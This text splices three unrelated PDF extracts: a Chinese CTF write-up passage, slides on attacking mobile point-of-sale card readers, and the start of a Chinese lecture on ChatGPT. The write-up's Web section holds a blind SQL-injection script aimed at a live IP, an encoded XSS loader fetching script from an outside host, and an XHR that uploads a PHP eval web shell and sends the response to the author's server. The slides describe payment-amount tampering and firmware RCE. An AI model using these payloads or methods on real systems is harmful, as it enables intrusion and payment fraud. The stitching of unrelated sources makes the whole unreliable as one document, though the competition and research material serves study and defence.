p.sendline(cipher.encode("hex")+ct[BS:BS+32].encode('hex'))
p.interactive()
main()
Misc
8/22
比如153,39, 在python2.7中这些值没有对应的opcode
参考:https://github.com/python/cpython/blob/2.7/Include/opcode.h
所以尝试人工进行修复
发现一个全局变量 rotor , 不属于代码中定义的函数,猜测是 import rotor 进来
的,google了一下这个模块的用法: https://docs.python.org/2.0/lib/module-rotor.html
之前发现加解密函数的co_code几乎一样,但是通过局部变量发现 co_names :
dis.dis(decrypt.co_code)
0 <153> 1
3 BUILD_SET 1
6 <153> 2
9 BUILD_SET 2
12 <153> 3
15 BUILD_SET 3
18 STORE_GLOBAL 1 (1)
21 <153> 4
24 PRINT_EXPR
25 <153> 5
28 <39>
29 STORE_GLOBAL 2 (2)
32 STORE_GLOBAL 1 (1)
35 <39>
36 STORE_GLOBAL 3 (3)
39 <39>
40 <153> 6
43 PRINT_EXPR
44 <39>
45 <153> 5
48 <39>
49 STORE_GLOBAL 2 (2)
52 <153> 6
55 PRINT_EXPR
56 <39>
57 <153> 7
60 <39>
61 BUILD_SET 4
64 <155> 0
67 DELETE_ATTR 1 (1)
70 STORE_GLOBAL 4 (4)
73 CALL_FUNCTION 1
76 BUILD_SET 5
79 STORE_GLOBAL 5 (5)
82 DELETE_ATTR 2 (2)
85 STORE_GLOBAL 0 (0)
88 CALL_FUNCTION 1
91 RETURN_VALUE
decrypt.co_names
('rotor', 'newrotor', 'decrypt')
encrypt.co_names
('rotor', 'newrotor', 'encrypt')
Misc
9/22
所以猜测区别是:
所以猜测了下解密函数的co_code代码:
所以现在要想办法还原出如何得到的变量 secret
对应的co_code:
猜测了下,co_code可能使用替代法来进行混淆,比如,把 LOAD_CONST 指令全部替换成
153, 上下部分都能猜出大概的指令, 参考: https://docs.python.org/2/library/dis.html
decrypt:
rot = rotor.newrotor(secret)
return rot.decrypt(rot)
encrypt:
rot = rotor.newrotor(secret)
return rot.encrypt(rot)
def decrypt(data):
key_a = '!@#$%^&*'
key_b = 'abcdefgh'
key_c = '<>{}:"'
secret = 某些操作
rot = rotor.newrotor(secret)
return rot.decrypt(rot)
18 STORE_GLOBAL 1 (1)
21 <153> 4
24 PRINT_EXPR
25 <153> 5
28 <39>
29 STORE_GLOBAL 2 (2)
32 STORE_GLOBAL 1 (1)
35 <39>
36 STORE_GLOBAL 3 (3)
39 <39>
40 <153> 6
43 PRINT_EXPR
44 <39>
45 <153> 5
48 <39>
49 STORE_GLOBAL 2 (2)
52 <153> 6
55 PRINT_EXPR
56 <39>
57 <153> 7
60 <39>
61 BUILD_SET 4
Misc
10/22
替换后得到:
得到代码:
字符串与字符串之间的操作OP2猜测为字符串拼接 +
OP1就有好几种可能了,比如:
四种可能一个一个去试:
18 LOAD_FAST 1(key_a)
21 LOAD_CONST 4(4)
24 PRINT_EXPR
25 LOAD_CONST 5('|')
28 <39>
29 LOAD_FAST 2(key_b)
32 LOAD_FAST 1(key_a)
35 <39>
36 LOAD_FAST 3(key_c)
39 <39>
40 LOAD_CONST 6(2)
43 PRINT_EXPR
44 <39>
45 LOAD_CONST 5('|')
48 <39>
49 LOAD_FAST 2(key_b)
52 LOAD_CONST 6(2)
55 PRINT_EXPR
56 <39>
57 LOAD_CONST 7('EOF')
60 <39>
61 STORE_FAST 4(secret)
secret = key_a OP1 4 OP2 "|" OP2 (key_b OP2 key_a OP2 key_c) OP1 2 OP2 "|" + key_b O
P1 2 OP2 "EOF"
key_a[4]
key_a[:4]
key_a[4:]
key_a*4
def decrypt(data):
key_a = "!@#$%^&*"
key_b = "abcdefgh"
key_c = '<>{}:"'
secret=key_a*4 + "|" + (key_b+key_a+key_c)*2 + "|" + key_b*2 + "EOF"
# secret=key_a[4] + "|" + (key_b+key_a+key_c)[2] + "|" + key_b[2] + "EOF"
# secret=key_a[4:] + "|" + (key_b+key_a+key_c)[2:] + "|" + key_b[2:] + "EOF"
# secret=key_a[:4] + "|" + (key_b+key_a+key_c)[:2] + "|" + key_b[:2] + "EOF"
rot = rotor.newrotor(secret)
return rot.decrypt(data)
Misc
11/22
最后当OP1为 * 时可以成解出flag
Crypto:
OneTimePad
这题原理没搞懂,只是发现一个特性, process传入结果和key,循环255次可以得到
seed
payload:
Crypto:
12/22
Re
#!/usr/bin/env python
# coding=utf-8
from os import urandom
def process(m, k):
tmp = m ^ k
res = 0
# print "tmp:{%s}"%tmp
for i in bin(tmp)[2:]:
# print i
res = res << 1;
if (int(i)):
res = res ^ tmp
if (res >> 256):
res = res ^ P
return res
def keygen(seed):
key = str2num(urandom(32))
print "key:{%s}"%key
print "seed:{%s}"%seed
while True:
yield key
key = process(key, seed)
def str2num(s):
return int(s.encode('hex'), 16)
P = 0x10000000000000000000000000000000000000000000000000000000000000425L
true_secret = ""
fake_secret1 = "I_am_not_a_secret_so_you_know_me"
fake_secret2 = "feeddeadbeefcafefeeddeadbeefcafe"
true_secret_key = 0
fake_secret1_key = 0x2a51d5b1bd1abdee4999363397902036332916fbce0982ebd3f5ece8e3ea395
9
fake_secret2_key = 0x8f76be63af819557a5a88fca37f631b750348eb8ab0cb69fbdb0b94e4a522b7
eL
ctx1 = 0xaf3fcc28377e7e983355096fd4f635856df82bbab61d2c50892d9ee5d913a07f
ctx2 = 0x630eb4dce274d29a16f86940f2f35253477665949170ed9e8c9e828794b5543c
ctx3 = 0xe913db07cbe4f433c7cdeaac549757d23651ebdccf69d7fbdfd5dc2829334d1b
seed = 0
for i in xrange(255):
fake_secret2_key = process(fake_secret2_key,fake_secret1_key)
seed = fake_secret2_key
print "seed:{%s}"%hex(seed)[:-1]
for i in xrange(255):
fake_secret1_key = process(fake_secret1_key, seed)
true_secret_key = fake_secret1_key
print "true_secret_key:{%s}"%hex(true_secret_key)[:-1]
print "flag:{flag{%s}}"%hex(true_secret_key ^ ctx1)[2:-1].decode('hex')
Re
13/22
choices
lib0opsPass.so是一个基于 ollvm 那套东西做的一个clang 插件,功能是将控制流平坦
化,同时通过密码控制平摊化后的控制流的执行顺序,从而起到加密的作用。
主要的函数是Oops::OopsFlattening::flatten,通过分析该函数,可以得知switch的
case 是由scramble32生成的,参数是代码里通过 label 指定的。scramble32还使用了
oopsSeed的值。
在oopsSeed已知的情况下只要枚举label后面跟着的数字值,就可以获得所有的 case
的先后顺序。
由于lib0opsPass.so导入了 toobfuscate 这个函数(虽然并没有启用 ollvm 的功
能),所以必须给原来的clang3.9.1加上ollvm的lib/Transforms/Obfuscation/ 中的内
容。
在 test.cpp 中写满
这样的代码片段,枚举数字
通过 clang -Xclang -load -Xclang lib0opsPass.so -mllvm -
oopsSeed=BAADF00DCAFEBABE3043544620170318 source.c 命令行编译
通过分析编译得到的程序中 case值 和数字的对应关系得到原程序的执行顺序。最终得
到 flag flag{wHy_d1D_you_Gen3R47e_cas3_c0nst_v4lUE_in_7h15_way?}
engineTest
程序是个 vm
有四种 opcode
分别是 and 1 or 2 xor 3 if 4
整个 vm 程序不存在任何跳转,控制流只有一条
因此 dump 出整个程序,借助脚本转化为 z3 程序,求解即可得到结果
最后有个小坑,是 flag 在 vm 的内存中保存方式是和正常情况相反的,要稍加处理。
转换脚本:
Label数字:
printf("数字");
Re
14/22
Web:
simplesqlin
特殊过滤,总之%00会被去掉,貌似出题人是考察框架过滤问题然后bypass。
Temmo’s Tiny Shop
Like注入,过滤了很多东西,就剩逗号括号了,不过也够用了:
脚本:
ip = ['0000000000000110', '0000000000000002', '0000000000000003', ……] # 后面省略
op = ['0000000000000040', '00000000000087e9', '00000000000087ea', ……]
data4 = ['00000000000000d4', '0000000000004090', '0000000000004091', ……]
data3 = ['0000000000000002', '0000000000000000', '0000000000000000', ……]
data2 = ['0000000000000003', '0000000000000000', '0000000000000002', ……]
f = open('output.py', 'wb')
for i, v in enumerate(data4):
opcode = int(data2[n * 5], 16)
arg1 = int(data2[n * 5 + 1], 16)
arg2 = int(data2[n * 5 + 2], 16)
arg3 = int(data2[n * 5 + 3], 16)
dest = int(data2[n * 5 + 4], 16)
output_line = ''
if opcode == 2:
output_line = 'b[%d] = Or(b[%d], b[%d])' % (dest, arg1, arg2)
elif opcode == 3:
output_line = 'b[%d] = Xor(b[%d], b[%d])' % (dest, arg1, arg2)
elif opcode == 1:
if arg1 == 0 or arg2 == 0:
output_line = 'b[%d] = False' % (dest)
elif arg1 == 1 or arg2 == 1:
output_line = 'b[%d] = b[%d]' % (dest, arg1 if arg2 == 1 else arg2)
else:
output_line = 'b[%d] = And(b[%d], b[%d])' % (dest, arg1, arg2)
elif opcode == 4:
if arg2 == arg3 or arg1 == 1:
output_line = 'b[%d] = b[%d]' % (dest, arg2)
elif arg1 == 0:
output_line = 'b[%d] = b[%d]' % (dest, arg3)
else:
output_line = 'b[%d] = If(b[%d], b[%d], b[%d])' % (
dest, arg1, arg2, arg3)
else:
print('wrong')
print(i)
f.write(output_line + '\n')
f.close()
Web:
15/22
有长度限制,单词换成%_接着跑就OK。也可以通过substr。
KOG
题目是一个很明显的js,是一个js的llvm,实现了一个特别复杂的验证,我们在
functionn.js中可以发现所有的检验应该都是在这个函数之中的。我们根据正常的思
路,首先是发现如果输入注入语句,不返回hash,所以猜测是 if(存在注入)return 这种形
式,全部的js一共13个return,4个带if判断,一个一个的测试吧 if(xxxx) 改成 if(0) ,这
种形式,发现
在 __Z10user_inputNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEE 这个
函数之中,存在的两个 if--return 都hook之后,可以正常返回hash。
1490411456404
# -*- coding:utf-8 -*-
import requests
import re
dic="abcdefghijklmnopqrstuvwxyz0123456789{}_"
flag=''
flagis=''
for i in range(1,100):
for j in dic:
flag1=j.encode('hex')
cook={"PHPSESSID":"2pkk8otq21s1t2lru6q941vh32"}
url="http://202.120.7.197/app.php?action=search&keyword=&order=if((select((f
lag))from(ce63e444b0d049e9c899c9a0336b3c59))like(0x"+flag+flag1+"25),name,price)"
b=requests.get(url=url,cookies=cook)
if "price" in b.text:
num1=b.text.split("price\":\"")[1].split("\"")[0]
num2=b.text.split("price\":\"")[2].split("\"")[0]
if int(num2) < int(num1):
flagis+=j
print "flag:"+flagis
flag+=flag1
Break
Web:
16/22
1490411465209
于是猜测这个函数就是过滤函数。我们本地吧 index.html 和 function.js 弄好,直接访
问之后可以抓到一个请求,之后把请求中的地址改成 202.120.7.213:11181 就可以注入
了,是一个没有过滤的注入,就可以直接拿到flag
1490411821728
1490411806247
1490411867138
simple xss
首先测试过滤,发现 <> 不能成对出现,其他发现可用字符特别少,然后测试发现 \ 没
有过滤,于是想到可以找一个不需要成对出现 < 的标签: link ,构造 payload : <link
rel=import href=\\ 这样的标签,但是发现 . 被过滤了,可以利用浏览器中 。 会被认
为 . 的特点绕过,发现这个玩意是默认https的,找一个https的网站就好了,在网站目
录新建一个目录,放一个 index。php 的文件,在文件头加上 <?php header("Access-
Control-Allow-Origin: *");?> ,之后直接利用jquery访问就可以拿到flag了
Web:
17/22
1490412706753
Web:
18/22
1490413645171
Web:
19/22
最终payload: <link rel=import href=\\virusdefender。net\ctf (应该是这样的。。当时
的没记得,我记得提交了好几次)
关键点就是四个:
- 利用 \\ 绕过 //
- 利用 。 绕过 .
- 找到一个不需要 <> 的标签link
- 找一个https网站
complicated xss
http://government.vip/
先上payload
<body><script src=http://xss.albertchang.cn/0ctf.html></script></body>
function setCookie(name, value, seconds) {
seconds = seconds || 0; //seconds有值就直接赋值,没有为0,这个根php不一样。
var expires = "";
if (seconds != 0 ) { //设置cookie生存时间
var date = new Date();
date.setTime(date.getTime()+(seconds*1000));
expires = "; expires="+date.toGMTString();
}
document.cookie = name+"="+value+expires+"; path=/;domain=government.vip"; //转码并
赋值
}
setCookie('username','<iframe src=\'javascript:eval(String.fromCharCode(118, 97, 114
, 32, 97, 108, 98, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97,
116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34,
41, 59, 97, 108, 98, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 120,
115, 115, 46, 97, 108, 98, 101, 114, 116, 99, 104, 97, 110, 103, 46, 99, 110, 47, 9
7, 108, 98, 101, 114, 116, 46, 106, 115, 34, 59, 100, 111, 99, 117, 109, 101, 110, 1
16, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100,
40, 97, 108, 98, 41, 59))\'></iframe>',1000)
var ifm=document.createElement('iframe');ifm.src='http://admin.government.vip:8000/'
;document.body.appendChild(ifm);
Web:
20/22
随便登陆一个test,查看源码发现删了很多东西
1490413874956
思路就是根域名触发xss,然后给所有域种上cookie,cookie的username字段会输出
在admin域那个页面,这样就能在admin域执行XSS了,读到html发现表单就是
var xhr = new XMLHttpRequest();xhr.open("POST", "http://admin.government.vip:8000/up
load", true);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebK
itFormBoundaryrGKCBY7qhFd3TrwA");
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/
xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryrGKCBY7qhFd3TrwA\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n
" +
"Content-Type: image/png\r\n" +
"\r\n" +
"GIF89a\x3c?php eval($_POST[albert]);?\x3e\x3c/script\x3e\r\n" +
"------WebKitFormBoundaryrGKCBY7qhFd3TrwA--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.onload = uploadComplete;
xhr.send(new Blob([aBody]));
function uploadComplete(evt) {
new Image().src ="http://xss.albertchang.cn/?data="+escape(evt.target.r
esponseText);
}
<p>Upload your shell</p>
<form action="/upload" method="post" enctype="multipart/form-data">
<p><input type="file" name="file"></input></p>
<p><input type="submit" value="upload">
Web:
21/22
,所以在admin域构造个文件上传,然后拿到他的返回值,并通过`new Image().src
="http://xss.albertchang.cn/?data="+escape(evt.target.responseText);`这样的方式
发到自己的vps就好了
Web:
22/22 | pdf |
FOR THE LOVE OF MONEY
Finding and exploiting vulnerabilities in mobile point of sales
systems
LEIGH-ANNE GALLOWAY & TIM YUNUSOV
POSITIVE TECHNOLOGIES
MPOS GROWTH
2010
Single vendor
2018
Four leading vendors
shipping thousands of units per day
Motivations
Motivations
MWR Labs “Mission mPOSsible” 2014
Related Work
Mellen, Moore and Losev “Mobile Point of Scam: Attacking the Square Reader” (2015)
Related Work
Research Scope
Research Scope
PAY PA L
S Q U A R E
I Z E T T L E
S U M U P
Research Scope
“How much security can really be embedded
in a device that is free?”
Research Scope
PHONE/SERVER
HARDWARE
DEVICE/PHONE
MOBILE APP
SECONDARY FACTORS
Research Scope
MERCHANT
ACQUIRER
CARD BRANDS
ISSUER
Background
MPOS
PROVIDER
ACQUIRER
CARD BRANDS
ISSUER
MERCHANT
MERCHANT
Background
CARD RISK BY OPERATION TYPE
Chip & PIN
Chip & Signature
Contactless
Swiped
PAN Key Entry
Background
EMV enabled POS devices make up between 90-95%
of POS population
E U E M V AC C E P TA N C E
EMV enabled POS devices make up 13% of POS
population and 9% of the ATM population
90%
13%
U S E M V AC C E P TA N C E
GLOBAL ADOPTION OF EMV - POS TERMINALS
Background
Around 96% of credit cards in circulation support EMV
as a protocol
E M V C R E D I T C AR D AD O P T I O N
However less than half of all transactions are made by
chip
E M V C R E D I T C AR D U S AG E
96%
41%
Background
79% of debit cards in circulation support EMV as a
protocol
E M V D E B I T C AR D AD O P T I O N
However less than half of all transactions are made
using chip
E M V D E B I T C AR D U S AG E
79%
23%
Background
46%
52
MILLIO
N
PERCENTAGE OF TRANSACTIONS
MILLIONS OF NUMBER OF UNITS
MPOS TIMELINE
Background
46%
52
SCHEMATIC OVERVIEW OF COMPONENTS
Background
VULNERABILITIES
SENDING ARBITRARY COMMANDS
AMOUNT MODIFICATION
REMOTE CODE EXECUTION
HARDWARE OBSERVATIONS
SECONDARY FACTORS
Methods & Tools
BLUETOOTH
Methods & Tools
Host Controller Interface (HCI)
SOFTWARE
BT PROFILES, GATT/ATT
L2CAP
LINK MANAGER PROTOCOL (LMP)
BASEBAND
BLUETOOTH RADIO
HOST
CONTROLLER
BLUETOOTH PROTOCOL
Methods & Tools
GATT (Generic Attribute)
/ATT(Attribute Protocol)
RFCOMM
Service
UUID
Characteristic
UUID
Value
Methods & Tools
BLUETOOTH AS A COMMUNICATION CHANNEL
NAP
UAP
LAP
68:AA
D2
0D:CC:3E
Org Unique Identifier
Unique to device
Methods & Tools
BLUETOOTH ATTACK VECTORS
SLAVE
MASTER
1.
2.
Eavesdropping/MITM
Manipulating characteristics
Methods & Tools
$120
$20,000
Frontline BPA 600
Ubertooth One
Methods & Tools
Methods & Tools
SENDING ARBITRARY
COMMANDS
Findings
•
Initiate a function
•
Display text
•
Turn off or on
MANIPULATING CHARACTERISTICS
User authentication doesn’t exist in the Bluetooth protocol,
it must be added by the developer at the application layer
Findings
1.
2.
3.
Findings
Findings
Findings
LEADING PART
MESSAGE
TRAILING
PART
CRC
END
02001d06010b000000
010013
506c656173652072656d6f76652063
617264
00ff08
3c62
03
“Please remove card”
Findings
1. Force
cardholder
to
use
a
more
vulnerable
payment
method
such
as
mag-stripe
2. Once
the
first
payment
is
complete,
display
“Payment
declined”,
force
cardholder
to
authorise
additional
transaction.
ATTACK VECTORS
Findings
AMOUNT TAMPERING
Findings
HOW TO GET ACCESS TO
TRANSACTIONS AND COMMANDS
HTTPS
DEVELOPER BLUETOOTH LOGS
RE OF APK ENABLE DEBUG
BLUETOOTH SNIFFER
Findings
HOW TO GET ACCESS TO COMMANDS
1. 0x02ee = 7.50 USD
0x64cb = checksum
2. 0100 = 1.00 USD
0x8a = checksum
Findings
MODIFYING PAYMENT AMOUNT
1.
Modified payment value
2.
Original (lower) amount
displayed on card reader
for the customer
3.
Card statement showing
higher authorised
transaction amount
1
2
3
Findings
MODIFYING PAYMENT AMOUNT
TYPE OF
PAYMENT
AMOUNT
TAMPERING
SECURITY
MECHANISMS
MAG-STRIPE
TRACK2
----
CONTACTLESS
POSSIBLE
AMOUNT CAN BE
STORED IN
CRYPTOGRAM
CHIP AND PIN
-----
AMOUNT IS STORED
IN CRYPTOGRAM
LIMIT PER TRANSACTION: 50,000 USD
Findings
ATTACK
Service Provider
$1.00
payment
$1.00
payment
50,000 payment
Customer
Fraudulent merchant
Findings
MITIGATION ACTIONS FOR SERVICE
PROVIDERS
DON’T USE VULNERABLE OR OUT-OF-DATE
FIRMWARE
NO DOWNGRADES
PREVENTATIVE MONITORING
Findings
REMOTE CODE
EXECUTION
Findings
RCE = 1 REVERSE ENGINEER + 1 FIRMWARE
@ivachyou
Findings
HOW FIRMWARE ARRIVES ON THE READER
https://frw.******.com/_prod_app_1_0_1_5.bin
https://frw.******.com/_prod_app_1_0_1_5.sig
https://frw.******.com/_prod_app_1_0_1_4.bin
https://frw.******.com/_prod_app_1_0_1_4.sig
Header
- RSA-2048 signature (0x00 - 0x100)
Body
- AES-ECB encrypted
Findings
https://www.paypalobjects.com/webstatic/mobile/pph/sw_repo_app/u
s/miura/m010/prod/7/M000-MPI-V1-41.tar.gz
https://www.paypalobjects.com/webstatic/mobile/pph/sw_repo_app/u
s/miura/m010/prod/7/M000-MPI-V1-39.tar.gz
HOW FIRMWARE ARRIVES ON THE READER
Findings
HOW FIRMWARE ARRIVES ON THE READER
Findings
RCE
HOW FIRMWARE ARRIVES ON THE READER
Findings
INFECTED MPOS
PAYMENT ATTACKS
COLLECT TRACK 2/PIN
PAYMENT RESEARCH
Findings
Findings
DEVICE PERSISTENCE
GAME OVER
REBOOT
Findings
ATTACK
Service Provider
Reader
UPDATES
RCE
Device with
a Bluetooth
Fraudulent customer
Merchant
Findings
MITIGATIONS
NO VULNERABLE OR OUT-OF-DATED
FIRMWARE
NO DOWNGRADES
PREVENTATIVE MONITORING
Findings
Findings
HARDWARE OBSERVATIONS
Findings
SECONDARY FACTORS
ENROLMENT PROCESS
ON BOARDING CHECKS VS TRANSACTION MONITORING
DIFFERENCES IN GEO – MSD, OFFLINE PROCESSING
WHAT SHOULD BE CONSIDERED AN ACCEPTED RISK?
: (
:0
ACCESS TO HCI LOGS/APP, LOCATION SPOOFING
Findings
Reader
Cost reader/Fee
per transaction
Enrollment process
Antifraud +
Security checks
Physical security
FW RE
Mobile Ecosystem
Arbitrary commands
Red teaming
Amount tampering
Square [EU]
$51
1.75-2.5%
Low - no anti
money laundering
checks but some
ID checks
Strict – active
monitoring of
transactions
N/A
-
strict
-
-
-
Square [USA]
Strict – correlation
of “bad” readers,
phones and acc
info
N/A
-
medium (dev)
-
+
-
$50
2.5-2.75%
Free
2.5-2.75%
Square mag-stripe
[EU + USA]
Strict (see above)
Low
-
low
-
+
+ [no display]
Square miura
[USA]
Strict (see above)
N/A
+
N/A
+ [via RCE]
+
+ (via RCE)
$130
2.5-2.75%
PayPal miura
$60
1-2.75%
High - anti-money
laundering checks
+ credit check (to
take out credit
agreement)
Strict – transaction
monitoring
N/A
+
low
+ [via RCE]
+
+ (via RCE)
SumUp datecs
$40
1.69%
Low - no anti
money laundering
checks but some
ID checks
Low – limited
monitoring of
accounts
Medium
-
low
+
+
+
iZettle datecs
$40
1.75%
Medium - ant-
money laundering
check + ID checks
Low – limited
monitoring, on
finding suspect
activity block
withdrawal - acc
otherwise active
High
-
low
+
-
+
Conclusions
PAYMENT
PROVIDER
1.
Carry out an assessment of reader to gather preliminary data + info from cards.
2.
Use data to carry out normal transactions to obtain baseline.
3.
Use info obtained during this process to identify potential weaknesses and
vulnerabilities.
4.
Carry out “modified” transactions
MPOS FOR RED TEAMING
Conclusions
: 0
ASSESSING RISK - WHAT DOES THIS MEAN FOR YOUR BUSINESS?
: (
: |
Conclusions
Conclusions
CONCLUSIONS
RECOMMENDATIONS FOR MPOS MANUFACTURERS
Control firmware versions, encrypt & sign
firmware
Use Bluetooth pairing mode that provides
visual confirmation of reader/phone pairing
such as pass key entry
Integrate security testing into the
development process
Implement user authentication and input
sanitisation at the application level
Conclusions
CONCLUSIONS
Protect deprecated protocols such as mag-
stripe
Use preventive monitoring as a best practice
Don’t allow use of vulnerable or out-of-date
firmware, prohibit downgrades
RECOMMENDATIONS FOR MPOS VENDORS
Place more emphasis on enrolment checks
Protect the mobile ecosystem
Implement user authentication and input
sanitization at application level
Conclusions
CONCLUSIONS
Control physical access to devices
Do not use mag-stripe transactions
RECOMMENDATIONS FOR MPOS MERCHANTS
Assess the mPOS ecosystem
Choose a vendor who places emphasis on
protecting whole ecosystem
Conclusions
THANKS
Hardware and firmware:
Artem Ivachev
Leigh-Anne Galloway
@L_AGalloway
Tim Yunusov
@a66at
Hardware observations:
Alexey Stennikov
Maxim Goryachy
Mark Carney | pdf |
ChatGPT技术分析
刘群 LIU Qun
华为诺亚方舟实验室 Huawei Noah’s Ark Lab
在线讲座 (an online lecture)
2023-02-16
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
ChatGPT轰动效应
▶ 用户数:5天100万,2个月达到1亿
▶ 所有人都开始讨论ChatGPT,传播速度堪比
新冠病毒
▶ Google内部拉响红色警报
▶ Google紧急仅仅发布Bard,但因发布现场出
现错误导致股票蒸发8%
▶ 微软追加投资OpenAI一百亿美元
▶ 微软迅速推出加载了ChatGPT的New Bing,
并计划将ChatGPT接入Office套件
▶ 国内外大厂迅速跟进
1 total: 40
ChatGPT官方博客:简介
ChatGPT: Optimizing
Language Models
for Dialogue
We’ve trained a model called ChatGPT which interacts in a
conversational way. The dialogue format makes it possible for
ChatGPT to answer followup questions, admit its mistakes,
challenge incorrect premises, and reject inappropriate requests.
ChatGPT is a sibling model to InstructGPT, which is trained to
follow an instruction in a prompt and provide a
detailed response.
November 30, 2022
13 minute read
We are excited to introduce ChatGPT to get users’ feedback and learn about its strengths and weaknesses. During the research
preview, usage of ChatGPT is free. Try it now at chat.openai.com.
We are excited to introduce ChatGPT to get users’ feedback and learn about its strengths and weaknesses. During the research
preview, usage of ChatGPT is free. Try it now at chat.openai.com.
TRY CHATGPT ↗
ChatGPT Blog: https://openai.com/blog/chatgpt/
2 (1) total: 40
ChatGPT官方博客:简介
The main features of ChatGPT highlighted in the official blog:
▶ answer followup questions
▶ admit its mistakes
▶ challenge incorrect premises
▶ reject inappropriate requests
ChatGPT Blog: https://openai.com/blog/chatgpt/
2 (2) total: 40
ChatGPT模型大小
ChatGPT是基于GPT-3的Davinci-3模型开发的:
3 (1) total: 40
ChatGPT模型大小
GPT-3论文中提供了一下不同规模的版本:
OpenAI对外提供的API提供了以下4个模型:
3 (2) total: 40
ChatGPT模型大小
根据数据对比,Davinci模型应该对应于最大(175B)的GPT-3模型:
On the Sizes of OpenAI API Models
Using eval harness, we can deduce the sizes of OpenAI API models from their performance.
May 24, 2021 · Leo Gao
OpenAI hasn’t officially said anything about their API model sizes, which naturally leads to the
question of just how big they are. Thankfully, we can use eval harness to evaluate the API models
on a bunch of tasks and compare to the figures in the GPT-3 paper. Obviously since there are
going to be minor differences in task implementation and OpenAI is probably fine tuning their API
models all the time, the numbers don’t line up exactly, but they should give a pretty good idea of
the ballpark things are in.
Model
LAMBADA ppl ↓
LAMBADA acc ↑
Winogrande ↑
Hellaswag ↑
PIQA ↑
GPT-3-124M
18.6
42.7%
52.0%
33.7%
64.6%
GPT-3-350M
9.09
54.3%
52.1%
43.6%
70.2%
Ada
9.95
51.6%
52.9%
43.4%
70.5%
GPT-3-760M
6.53
60.4%
57.4%
51.0%
72.9%
GPT-3-1.3B
5.44
63.6%
58.7%
54.7%
75.1%
Babbage
5.58
62.4%
59.0%
54.5%
75.5%
GPT-3-2.7B
4.60
67.1%
62.3%
62.8%
75.6%
GPT-3-6.7B
4.00
70.3%
64.5%
67.4%
78.0%
Curie
4.00
68.5%
65.6%
68.5%
77.9%
GPT-3-13B
3.56
72.5%
67.9%
70.9%
78.5%
GPT-3-175B
3.00
76.2%
70.2%
78.9%
81.0%
Davinci
2.97
74.8%
70.2%
78.1%
80.4%
All GPT-3 figures are from the GPT-3 paper; all API figures are computed using eval harness
Ada, Babbage, Curie and Davinci line up closely with 350M, 1.3B, 6.7B, and 175B respectively.
Obviously this isn’t ironclad evidence that the models are those sizes, but it’s pretty suggestive.
Leo Gao, On the Sizes of OpenAI API Models, https://blog.eleuther.ai/gpt3-model-sizes/
3 (3) total: 40
ChatGPT时间线
GPT-3.5 + ChatGPT: An illustrated
overview
Alan D. Thompson
December 2022
Summary
The original May 2020 release of GPT-3 by OpenAI (founded by Elon Musk)
Timeline to ChatGPT
Date
Milestone
11/Jun/2018
GPT-1 announced on the OpenAI blog.
14/Feb/2019
GPT-2 announced on the OpenAI blog.
28/May/2020
Initial GPT-3 preprint paper published to arXiv.
11/Jun/2020
GPT-3 API private beta.
22/Sep/2020
GPT-3 licensed to Microsoft.
18/Nov/2021
GPT-3 API opened to the public.
27/Jan/2022
InstructGPT released, now known as GPT-3.5. InstructGPT preprint
paper Mar/2022.
28/Jul/2022
Exploring data-optimal models with FIM, paper on arXiv.
1/Sep/2022
GPT-3 model pricing cut by 66% for davinci model.
21/Sep/2022
Whisper (speech recognition) announced on the OpenAI blog.
28/Nov/2022
GPT-3.5 expanded to text-davinci-003, announced via email:
1. Higher quality writing.
2. Handles more complex instructions.
3. Better at longer form content generation.
30/Nov/2022
ChatGPT announced on the OpenAI blog.
Next…
GPT-4…
Table. Timeline from GPT-1 to ChatGPT.
Overview of GPT-3 (May/2020)
Alan D. Thompson, GPT-3.5 + ChatGPT: An illustrated overview, https://lifearchitect.ai/chatgpt/
4 total: 40
ChatGPT官方博客:迭代部署
Ideally, the model would ask clarifying questions when the user provided an ambiguous query. Instead, our current models usually
guess what the user intended.
While we’ve made efforts to make the model refuse inappropriate requests, it will sometimes respond to harmful instructions or
exhibit biased behavior. We’re using the Moderation API to warn or block certain types of unsafe content, but we expect it to have
some false negatives and positives for now. We’re eager to collect user feedback to aid our ongoing work to improve this system.
Iterative deployment
Today’s research release of ChatGPT is the latest step in OpenAI’s iterative deployment of increasingly safe and useful AI systems.
Many lessons from deployment of earlier models like GPT-3 and Codex have informed the safety mitigations in place for this release,
including substantial reductions in harmful and untruthful outputs achieved by the use of reinforcement learning from human
feedback (RLHF).
CHATGPT
INSTRUCTGPT: TEXT-DAVINCI-
Tell me about when Christopher Columbus
came to the US in
This question is a bit tricky because
Christopher Columbus died in , so he
could not have come to the US in . But let’s
pretend for a moment that he did!
If Columbus arrived in the US in , he would
likely be very surprised at the changes that
Tell me about when Christopher Columbus
came to the US in
Christopher Columbus came to the US in
and he was very excited to be here. He had
always wanted to visit the US and he was very
curious about our country. He was very
impressed with our country and he enjoyed his
time here.
从部署GPT-3和Codex等早期模型中吸取的许多经验教训,为本版本的安全缓解措
施提供了帮助,包括通过使用人类反馈强化学习(RLHF)来大幅减少有害和失真
信息的输出。
ChatGPT Blog: https://openai.com/blog/chatgpt/
5 (1) total: 40
ChatGPT官方博客:迭代部署
We know that many limitations remain as discussed above and we plan to make regular model updates to improve in such areas. But
we also hope that by providing an accessible interface to ChatGPT, we will get valuable user feedback on issues that we are not
already aware of.
Users are encouraged to provide feedback on problematic model outputs through the UI, as well as on false positives/negatives from
the external content filter which is also part of the interface. We are particularly interested in feedback regarding harmful outputs
that could occur in real-world, non-adversarial conditions, as well as feedback that helps us uncover and understand novel risks and
